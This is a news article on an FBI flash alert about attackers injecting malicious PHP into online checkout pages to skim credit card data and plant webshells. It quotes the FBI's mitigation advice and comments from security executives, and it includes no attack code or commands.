The U.S. Federal Bureau of Investigation has issued a flash alert warning businesses that cyber actors are scraping credit card data from online checkout pages.
The alert states that as of January, the unidentified cyber attacker scraped credit card data from a business by injecting malicious PHP code into the business’ online checkout page. The attacker then sent the scaped data to a service that spoofed a legitimate card processing server.
Furthermore, it’s claimed that the attack also established backdoor access to the victim’s system by modifying two files within the checkout page.
This form of attack is hardly new – Magecart attacks have been prevalent for years, but as ZDNet points out, it appears that the methodology of inserting a different PHP function is a new variation on the typical attack. The actors create a backdoor using a debugging function and then installs two webshells onto the service, giving additional room for exploitation.
The FBI recommends that businesses update and patch all systems, change default login credentials and monitor requests performed against e-commerce systems to identify possible malicious activity. It is also recommended that websites be secured with SSL and that third-party software and hardware only be installed from trusted sources.
“This FBI warning is one that U.S. businesses should take very seriously,” Kunal Modasiya, senior director of product management at cybersecurity company PerimeterX Inc., told SiliconANGLE. “An attack whereby bad actors scraped online credit card data by injecting malicious PHP code into the checkout page is yet another way to steal customers’ personally identifiable information and payment data, abuse account information and commit fraud.”
Dave Cundiff, chief information security officer at managed security services company Cyvatar, noted that “continually verifying and monitoring an organization’s fundamental cybersecurity is a requirement these days.”
“If the fundamentals of an organization’s security are not strong, then the additional complexity of any additional security is useless,” Cundiff explained. “Almost all of the attacks or compromises we have been tracking over the last couple of years could have been prevented or at least had the impact greatly reduced by following the basic hygiene approach of fundamental security.”
“Patching systems, changing default passwords, reducing overlap in system communication, these principals of cybersecurity have been around for decades,” Cundiff added. “It is more and more critical to not get distracted by flashy sales pitches and focus on making sure your organization’s fundamental security is solid before moving to more advanced mitigations.”